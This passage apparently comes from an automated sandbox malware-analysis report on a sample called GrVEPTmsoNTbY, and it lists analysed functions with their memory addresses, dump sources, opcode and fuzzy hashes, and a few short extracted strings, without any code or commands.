                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c7965d1ca6bc2c5d4a183b853c26827b0bffdc7e82c975b05ba7e80b54d7f69
                                                      • Instruction ID: 81406ddba0200f4df2b04be04680321dfcb5e4f8726c8d7a370ac691c81d95d6
                                                      • Opcode Fuzzy Hash: 6c7965d1ca6bc2c5d4a183b853c26827b0bffdc7e82c975b05ba7e80b54d7f69
                                                      • Instruction Fuzzy Hash: 9FD05E31A1CA494EEB41B7B0841A3BD52D2BF10380F880479D85E971D3CF3E34006A94
                                                      Function 00007FF848E806AD Relevance: .0, Instructions: 13COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction ID: c31856955ed2e3c74bff67d5eed7038733c80ad951e00bd8430a1a3eff3b721d
                                                      • Opcode Fuzzy Hash: 0f056a88d4526d4a05755b6429272dcde325ccc0fd39d39c3356d543093bbfa2
                                                      • Instruction Fuzzy Hash: 86C08C00D0F90B08E440316F14020ACA2007FC47A4FE10032C01C42092EE3D20C5116E
                                                      Function 00007FF848E8559A Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction ID: 93df89259070d39eeee891dfa952953b187c30ae293fd6bc712e26a92ea0700f
                                                      • Opcode Fuzzy Hash: 86b4d57d277300af1bb407b1db35b0ccb04d8e894e64b2ce4cdfe60b85970ed7
                                                      • Instruction Fuzzy Hash: FCD05222C1D9228EFA72214008241BD0201AB803B0FA90772D86D2B0C09F7CAC019A2A
                                                      Function 00007FF848E812D8 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction ID: 4aa18af1f661fabb0a2e2203a43a442a2c3407ad42402b65ed2ba776a251d591
                                                      • Opcode Fuzzy Hash: 3434e4c200470a55205a769e0bdb57b0bd16550e86ef3948b0a85cc92d65b229
                                                      • Instruction Fuzzy Hash: D6C08C305108088FC908FB28C88480837A0FF09200BC20090E008C7170D229DCC1D741
                                                      Function 00007FF84927BB11 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 299d27ac29a438a21e31d4c071b39fcf03adac3ac7918a610f8854ffe054f334
                                                      • Instruction ID: 0d79c03173df7c6cdbbd72e9e05635c93f99bd6e04745a19cf10eed231764457
                                                      • Opcode Fuzzy Hash: 299d27ac29a438a21e31d4c071b39fcf03adac3ac7918a610f8854ffe054f334
                                                      • Instruction Fuzzy Hash: 20D0C93114C859CFDA94EE14C044D2533A2EB5838072144A4D10BD72A0DA24E800DB11
                                                      Function 00007FF849272D2B Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 82b84d5cc07c788f67f1729738969b631dd2ebdf5f03561d8709a120cf78d89b
                                                      • Instruction ID: 0d76f87d26ad2b492dc76c6043ac6d19bfe87a42bfeb242bfc0fed9d3459320a
                                                      • Opcode Fuzzy Hash: 82b84d5cc07c788f67f1729738969b631dd2ebdf5f03561d8709a120cf78d89b
                                                      • Instruction Fuzzy Hash: 1DD0C930A0C5F3CDF27D7E05812023D51976F00381F6088BDC47F659D1CD2D79426212
                                                      Function 00007FF848E84E07 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a82df4e185c3b279e434479206fee763e8f9fbc9982138a991260291aae5e8e9
                                                      • Instruction ID: 8ff4cadb2ee2c6feb4e67e043ec09938904b04b5102501b62e1db044b0eeacdc
                                                      • Opcode Fuzzy Hash: a82df4e185c3b279e434479206fee763e8f9fbc9982138a991260291aae5e8e9
                                                      • Instruction Fuzzy Hash: 0DC08C02E0DC969AE25A220450221BE84029F80784F9400B5E00E873CACF0C1E01028A
                                                      Function 00007FF848E806D0 Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: 37703ee556c4e8627d10b7c80c769574e06979db5dbbed10f1728ee220f40bb0
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: 0BB01200C5E40F04E40431BB084306C70407FC4244FC10070D40C41182E97D1094025A
                                                      Function 00007FF84927728C Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7efd958a6a047af3f30694f650bb31b8144337b8eaebe47d9b2864c3f85439b1
                                                      • Instruction ID: 06a0f054c628be8d6d79b5c6e04d23129402e1cbf9a9de6046d959f36418570b
                                                      • Opcode Fuzzy Hash: 7efd958a6a047af3f30694f650bb31b8144337b8eaebe47d9b2864c3f85439b1
                                                      • Instruction Fuzzy Hash: F1C04C41E1D3935FF62165A4486003C04991F96190F5605B59526A91C3DD5C68086329
                                                      Function 00007FF849272261 Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a4a672cd7dd1e67b7d78963f859c75ac1a497b2565900e1be44d3d9c5cb049e
                                                      • Instruction ID: 9fdcf20b563c70eeebfae422c86205676dd39e1c15f03eca3922b6427afa8db9
                                                      • Opcode Fuzzy Hash: 9a4a672cd7dd1e67b7d78963f859c75ac1a497b2565900e1be44d3d9c5cb049e
                                                      • Instruction Fuzzy Hash: 54B01200F0C253CFFA3034B0085003C00420B043C6F100670D32B963C7EC5C384812A0

                                                      Non-executed Functions

                                                      Function 00007FF848E809B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: 508fd9b11dbca8a712e9c77100bc4193ac5d01a65e4836f1305b72d3efba30f2
                                                      • Instruction ID: d8d3bf98ff88aa51002e8d513fa4bc641ecc0acbef1d3040d477bc56c04107bd
                                                      • Opcode Fuzzy Hash: 508fd9b11dbca8a712e9c77100bc4193ac5d01a65e4836f1305b72d3efba30f2
                                                      • Instruction Fuzzy Hash: 9F515ED6ADE86A7DE61D36BDB4111FD6B44EF812B5F4C93B7E04C890838E18608186FD

                                                      Executed Functions

                                                      Function 00007FF848E60D48 Relevance: 2.8, Strings: 2, Instructions: 268COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5[_H$<O_^
                                                      • API String ID: 0-4097811043
                                                      • Opcode ID: 1504adba6109c983c3d927becec905638bd250edd620dbeece9e56ac1b2f8527
                                                      • Instruction ID: 48f0f1134094dcea6feff726c8169f0551a41f83f0881cd59ebf1d9e5e4ef0ea
                                                      • Opcode Fuzzy Hash: 1504adba6109c983c3d927becec905638bd250edd620dbeece9e56ac1b2f8527
                                                      • Instruction Fuzzy Hash: CD910274D1CA998FE74AEB2888697A97FE1FB96350F4401BEC00DE72D2DB782805C715
                                                      Function 00007FF848E712B2 Relevance: .8, Instructions: 777COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d2f6651124437b2078573bb2396c54ed48de5862faf6f81c41584202018c1c75
                                                      • Instruction ID: 6ed2ecab86d19e0a591f2bec2a8130171d83e05723b84c72afc2b188dfcb6b84
                                                      • Opcode Fuzzy Hash: d2f6651124437b2078573bb2396c54ed48de5862faf6f81c41584202018c1c75
                                                      • Instruction Fuzzy Hash: EE32A331E1C95A9FEA98FA2884556B973E2FF94780F5441B9D00EC32C7DF39AC428785
                                                      Function 00007FF848E938ED Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K_H
                                                      • API String ID: 0-313846638
                                                      • Opcode ID: 5a04364149dd4d74afb1dfb7aba5f8b87fa29dcc9e24c7b5c7eef2b80f23bd46
                                                      • Instruction ID: 4bb1aba08801fbd0d35c43fe86e5f2956c0916aa32c285e8523a7f98dd93c36f
                                                      • Opcode Fuzzy Hash: 5a04364149dd4d74afb1dfb7aba5f8b87fa29dcc9e24c7b5c7eef2b80f23bd46
                                                      • Instruction Fuzzy Hash: E4811321E1C98A5FEA98FA6C845637573D2FF94784F0451B9D40DC32D7DEB8AC418389
                                                      Function 00007FF848E93943 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: K_H
                                                      • API String ID: 0-313846638
                                                      • Opcode ID: 1417b1c3db816ed05090b2f4e6b7d7a6c77180d3307ce5138c4693260de2eb9b
                                                      • Instruction ID: 130e9af05cfc330792abc39b35c62120fd33630eac7580c15382659381ef7607
                                                      • Opcode Fuzzy Hash: 1417b1c3db816ed05090b2f4e6b7d7a6c77180d3307ce5138c4693260de2eb9b
                                                      • Instruction Fuzzy Hash: 3551C020E1C94E5FEA98FA6C84563B973D2FF94798F049179D80EC3297DE78AC414385
                                                      Function 00007FF848E739F9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: c077d0536f444b8a9f7ca755632c820e59539509f58fcf9ef1d7ffdc6d030a66
                                                      • Instruction ID: 47ff2941b830ae47be1a686156ec20d976ea6786175147e52c3ac6ea4a1954c6
                                                      • Opcode Fuzzy Hash: c077d0536f444b8a9f7ca755632c820e59539509f58fcf9ef1d7ffdc6d030a66
                                                      • Instruction Fuzzy Hash: 9DF09B7190E7C54FC716EA3488694547FA0EF6720174A41EEC045CF1A3EA2DDC85C701
                                                      Function 00007FF848E921E9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: a3fc98c30183d817befaad58a7f6e55f14bd32c80d85a2e1cf28a36eda82bfc1
                                                      • Instruction ID: b124d02e397c1a7b8d0303321a6513e14cd487888f4127425d5d9bfeb77e7c54
                                                      • Opcode Fuzzy Hash: a3fc98c30183d817befaad58a7f6e55f14bd32c80d85a2e1cf28a36eda82bfc1
                                                      • Instruction Fuzzy Hash: D7F06D7194E7C44FCB1AEA348868454BFA0EF6721174A41EEC056CF1A7EA6D8885C701
                                                      Function 00007FF848E73A89 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 1b155bba8e84488f59a7e0520d627fdf7e0c85e9f4cbc9179c2a97a25e109091
                                                      • Instruction ID: 3a5bba4ef82aef689d8240946c3992f633d58c2cb1a681be0c0bcf63ba547b8a
                                                      • Opcode Fuzzy Hash: 1b155bba8e84488f59a7e0520d627fdf7e0c85e9f4cbc9179c2a97a25e109091
                                                      • Instruction Fuzzy Hash: 74E04F7194E7C54FDB4AFB34886A8543FA0EE6721178A40EEC085CF1B3E62DC889C701
                                                      Function 00007FF848E9ADE9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: bb9db8f43b936f5a9276f2212608ea6e09e5ea1b7c496b4efdb6c600900496e4
                                                      • Instruction ID: 3fdafac0eca549572a7c9544ab130378ecd1bed7e7640abfe0a55f293b209eef
                                                      • Opcode Fuzzy Hash: bb9db8f43b936f5a9276f2212608ea6e09e5ea1b7c496b4efdb6c600900496e4
                                                      • Instruction Fuzzy Hash: 9FE0487144E7D44FCB06EB7484698553FA0EF67615B8A40DEC045CF1B3E66D988AC701
                                                      Function 00007FF848E92279 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 14e9cd2fd34bdcd1ab25e42f361d0aa4373e0c220ce9b71c60bbb481b855a50b
                                                      • Instruction ID: a1ead72dabc0c1e0d961b4c791e8f8e33dcaf56f56cd3c594ab1bc0e3267adef
                                                      • Opcode Fuzzy Hash: 14e9cd2fd34bdcd1ab25e42f361d0aa4373e0c220ce9b71c60bbb481b855a50b
                                                      • Instruction Fuzzy Hash: CDE01A7184E7C44FCB4AEB74886A9943FA0EE6B21578A40EEC045CF1B3E62D8849C701
                                                      Function 00007FF848E980D9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 1d4c0adb280a7b74bed20475f351d23ccb1b6fc6b23704964918a18213da3daa
                                                      • Instruction ID: 529866176ef0b688c76d809301fc431a556a99169a3855fceffe04aa7ab50ff9
                                                      • Opcode Fuzzy Hash: 1d4c0adb280a7b74bed20475f351d23ccb1b6fc6b23704964918a18213da3daa
                                                      • Instruction Fuzzy Hash: BBE0127184E7D44FCB06EB7488798557FA0EE6725174B41EEC045CF1B3D62D8845C701
                                                      Function 00007FF848E71349 Relevance: .5, Instructions: 537COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: df2e1fe9ff93b0a05d34a3955f7ccaac0b2c2ba5fc72f3895c252824f8a25baa
                                                      • Instruction ID: 6943cb6df3dcabb2aa68cfc5c2c78aa9080888d7fa200c94c01c99c5f61da9ba
                                                      • Opcode Fuzzy Hash: df2e1fe9ff93b0a05d34a3955f7ccaac0b2c2ba5fc72f3895c252824f8a25baa
                                                      • Instruction Fuzzy Hash: D3027F30E1CA5A8FEB99FB2884516B973A1FF94740F5441B9D00ED3287DF39AC428B85
                                                      Function 00007FF848E608D0 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3f76b883b903f158d9b24129a49fa9cf5dc3a227a7c85cf5314f51dd06bea2c
                                                      • Instruction ID: b13b5a61f09471b54a7d1c3db0ca2e70e576d48d5ce21982eed33bbf399e1c3a
                                                      • Opcode Fuzzy Hash: c3f76b883b903f158d9b24129a49fa9cf5dc3a227a7c85cf5314f51dd06bea2c
                                                      • Instruction Fuzzy Hash: AA414752E4D9666EE309B378A0992F86B80FF853A5F1844BFD04CC71D3DE1878818698
                                                      Function 00007FF848E60998 Relevance: .1, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 855cb8445a79a483942e67e29afd66c3b74f5b2eaa8450621ec87319395f2a56
                                                      • Instruction ID: 5ae3cf1a23ec0db0d7a4c20aa25f5ee0ab8282df97a3c56aa4f1726157218b74
                                                      • Opcode Fuzzy Hash: 855cb8445a79a483942e67e29afd66c3b74f5b2eaa8450621ec87319395f2a56
                                                      • Instruction Fuzzy Hash: 6D411420A1E9995FE789F73844596797BC1FF99355F8400BDE40DC32D7EE28AC818348
                                                      Function 00007FF848E61171 Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 096ddd3606f07f6e4736003367e4246e666b728a0f24af7beae3d5c812122f4e
                                                      • Instruction ID: 3377898f091f45f53c8e27dd6f8e0b5b837e1d4aa35803a2697da9a618685f45
                                                      • Opcode Fuzzy Hash: 096ddd3606f07f6e4736003367e4246e666b728a0f24af7beae3d5c812122f4e
                                                      • Instruction Fuzzy Hash: BB31903090D68A8FDB46FB28C8599A97BF0FF56340F4801FBC009E71A2DB39A845C751
                                                      Function 00007FF848E92979 Relevance: .1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E91000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e91000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 848327f0cf8cf2924d8e7813d65b53e2c577573c88cfdf2b1d998d9677b1f290
                                                      • Instruction ID: 412c6f6ff46b8a396969533d717019f9ec006d69420253e657d3f875964f5419
                                                      • Opcode Fuzzy Hash: 848327f0cf8cf2924d8e7813d65b53e2c577573c88cfdf2b1d998d9677b1f290
                                                      • Instruction Fuzzy Hash: 2031B431E0C94A8FEB54EA58C4906A977E2FB98358F04427AC01EC72C7CF78AD418785
                                                      Function 00007FF848E60960 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 842885892cb01bf720a7e233b8dcf801c5a9d18e2e28fb03e8492c4de72d23ea
                                                      • Instruction ID: 04925ccd8350791d2387d46971e6eff886b92f141fa269046fb15fa3555367fd
                                                      • Opcode Fuzzy Hash: 842885892cb01bf720a7e233b8dcf801c5a9d18e2e28fb03e8492c4de72d23ea
                                                      • Instruction Fuzzy Hash: 4B21D351E4DD5A3EF658B27C644A6B866C5EF883A5F5840BAE40DC31D3DE2CBC80469C
                                                      Function 00007FF848E62A19 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74a5bc95528279d0bf9efaf27905a9ea30d52b67ed0fbb62744051dd28b87582
                                                      • Instruction ID: 46013800c90834bb859a11db80516c945551bd244e4f492b285ca7f6029c2a4c
                                                      • Opcode Fuzzy Hash: 74a5bc95528279d0bf9efaf27905a9ea30d52b67ed0fbb62744051dd28b87582
                                                      • Instruction Fuzzy Hash: 66216021E0C91A4FEAA4FA2884587B822D2FF94390F9446B6D40DF32D3DF78BC408749
                                                      Function 00007FF848E60C25 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e60000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 584e722b8e7630fe866011aba4508220cc79c9da42017519e767286aadfada4e
                                                      • Instruction ID: af6d47217d3cf88964d13bafd1f6ffeae59a1b8c7a977bfaa38b036a9b3370fe
                                                      • Opcode Fuzzy Hash: 584e722b8e7630fe866011aba4508220cc79c9da42017519e767286aadfada4e
                                                      • Instruction Fuzzy Hash: F421D331A0D6999FE712FB28C4452EC7FA0FF42364F5545B6C044EB1C2DB3829898755
                                                      Function 00007FF848E76D44 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2327947683.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7ff848e70000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 69b3c7983ce58908a4cd32e603136205f0f02f971fbb2aafebc2ff12a22fd4e2
                                                      • Instruction ID: 67a6eb3ff0139141714dc92bf27de1e7d90bd7c2eb160065a79604a0b3069690
                                                      • Opcode Fuzzy Hash: 69b3c7983ce58908a4cd32e603136205f0f02f971fbb2aafebc2ff12a22fd4e2
                                                      • Instruction Fuzzy Hash: 4B114F21E1C91A4FFA98FB2884556B87292FF98340F6405B9D40ED72D6DF38AC024784
                                                      Function 00007FF848E63D85 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
